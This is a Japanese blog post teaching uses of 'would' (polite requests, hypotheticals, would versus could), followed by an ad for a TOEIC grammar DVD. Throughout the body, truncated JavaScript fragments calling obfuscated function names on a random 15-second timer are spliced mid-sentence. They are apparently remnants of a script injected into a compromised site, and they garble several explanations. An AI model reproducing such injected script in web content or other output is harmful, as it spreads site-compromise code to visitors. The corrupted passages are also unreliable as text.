カナダでめちゃめちゃよく使われていた「Would」の使い方

みなさん、こんにちは。英文法勉強中の桃太郎です。

僕はカナダに2年間住んでいたことがありますが、「would」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}という単語がとてもよく使われていました。willの過去形ぐらいにしか意識していませんでしたが、現地の人があれほど使っているとは驚きでしたね。

今回はwouldの使い方をご紹介します。TOEIC問題でもよく出てきますので、ぜひ覚えておきましょう。

 

Wouldを使う時

丁寧に言いたいとき

「I want some water」という言い方も、「I would like some water」と言うとすごく丁寧になります。そのためカナダのモールやレストランで店員さんが使っていたり、またビジネスメールなどでは頻繁に使われてました。

  • Would you like a drink?
    「飲み物はいかがでしょうか?」
  • Would you help me?
    「ちょっと頼んでもいいでしょうか?」
  • It would be nice, sir.
    「それはとてもうれしいです。」
  • I would like to exchange yen for dollars.
    「円からドルに両替したいです。」
  • Would you like to hang out together next time?
    「今度ぜひ一緒に遊びませんか?」
  • How would you like to pay for it?
    「お支払いはどのようにしますか?」

「もし〜だったら」と言いたい時

ifがなくてもwouldだけで仮定法andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}になります。この使い方もカナダでは頻繁に使われていました。

  • What would you do?
    「あなたならどうしますか?」(※ちなみに「What would you do?」はアメリカで人気のバラエティ番組です。)
  • I would say it is too late.
    「遅すぎると思います。」
  • You would only waste your words.
    「言うだけムダだろう。」
  • It would be easier.
    「その方が簡単だろう。」
  • I would choose the long hair girl.
    「オレは長い髪の方を選ぶなぁ。」
  • You wouldn’t do that!( if you were in the same situation as me.)
    「オレと同じ状況だったらお前はしないよ!」

 

wouldとcouldの違い

wouldとcouldはどちらも丁寧な言い方をしたい時に使われますが、一体どんな違いがあるのでしょうか?

  • Would you do me a favour?
  • Could you do me a favour?

(お願いしてもよろしいでしょうか?)

  • would:「〜する意思がある」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}というニュアンス
  • could:「可能、~できる」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}というニュアンス

「Could you do me a favour?」と言うと、ニュアンスの中には「相手が可能かどうか?」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}の意味が含まれ、「もしも可能ならして頂きたい。」という感じになります。相手の意思ではなく、可能かどうかを尋ねているため、相手の意思は関係なく“遠回しの要求”をしていることになります。

「Would you do me a favour?」の場合は、「相手の意思を問う」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}意味が含まれ、「気に障りませんか?もし気にならないならして頂きたい。」という感じです。

 

そのため女性に結婚を申し込むときには、

– Would you marry me?
(結婚する意志はありますか?)

と聞くのが正しいです。もしここでcouldを使ってしまうと、

– Could you marry me?
– Yes, I could, but I wouldn’t.
(することはできますよ。でも結婚したくないですけどね。)

となるかもしれません….

 

さいごに

今回はカナダでよく使われていたwouldについてご紹介させていただきました。wouldはTOEIC問題でもよく出てきます。ぜひ使い方を覚えておきましょう!

book-image
 

TOEIC文法に特化した教材がここに!

3時間レッスンを驚き価格でご提供!

有名先生のリアル授業をDVDでお届け!

3時間の40レッスンのDVD教材がたったの1,800円!(税抜き)

購入はこちら! 購入はこちら!

この記事を書いた人

桃太郎

桃太郎

このサイトの管理人であり、モモセ先生のDVDで英文法を勉強中の桃太郎です。過去カナダに2年間在住していたことがありますが、『文法なんて別にどうでもいいでしょ!』と英文法を完全になめきっていました......このブログでは英文法をいま一度学び直している僕が、気づいたことや大事だと思ったことなどをみなさんにシェアしていきます。

桃太郎が書いた記事一覧はこちら

Facebookコメント